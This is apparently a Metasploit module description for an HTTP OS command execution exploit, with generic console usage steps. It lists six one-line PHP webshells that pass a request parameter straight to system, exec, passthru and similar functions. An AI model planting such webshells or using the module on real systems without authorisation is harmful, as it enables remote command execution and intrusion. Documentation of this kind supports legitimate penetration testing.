Description
This module interacts with existing command execution functionality on a target system, where user-supplied input is directly passed to system execution functions via a HTTP request. This could be from an existing vulnerability, or uploaded webshells such as: <?php passthru($_REQUEST['cmd']); ?> <?php system($_REQUEST['cmd']); ?> <?php echo exec($_REQUEST['cmd']); ?> <?php echo shell_exec($_REQUEST['cmd']); ?> <?php echo fread(popen($_REQUEST['cmd'], 'r'), 2096); ?> <?php echo `{$_REQUEST['cmd']}`; ?>
It is likely that HTTP evasion options will break this exploit.
Module options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/multi/http/os_cmd_execmsf undefined(os_cmd_exec) > show actions ...actions...msf undefined(os_cmd_exec) > set ACTION < action-name >msf undefined(os_cmd_exec) > show options ...show and set options...msf undefined(os_cmd_exec) > runPrioritise with Active Threat Intelligence
With curated Threat Intelligence, you can see which vulnerabilities truly put you at risk, prioritize what matters most, and act before attackers do.
Explore Intelligence Hub